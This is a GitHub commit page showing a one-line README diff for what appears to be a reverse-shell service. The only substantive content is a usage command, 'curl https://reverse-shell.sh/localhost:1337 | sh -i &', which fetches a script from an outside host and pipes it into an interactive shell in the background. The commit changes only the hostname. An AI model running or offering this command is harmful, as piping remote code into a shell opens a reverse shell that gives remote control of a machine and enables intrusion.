We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 04789e6 commit a37aa9dCopy full SHA for a37aa9d
README.md
@@ -76,7 +76,7 @@ The following command will run the reverse shell in a background process and exi
76
Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.
77
78
```shell
79
-sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit
+sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
80
```
81
82
## License
0 commit comments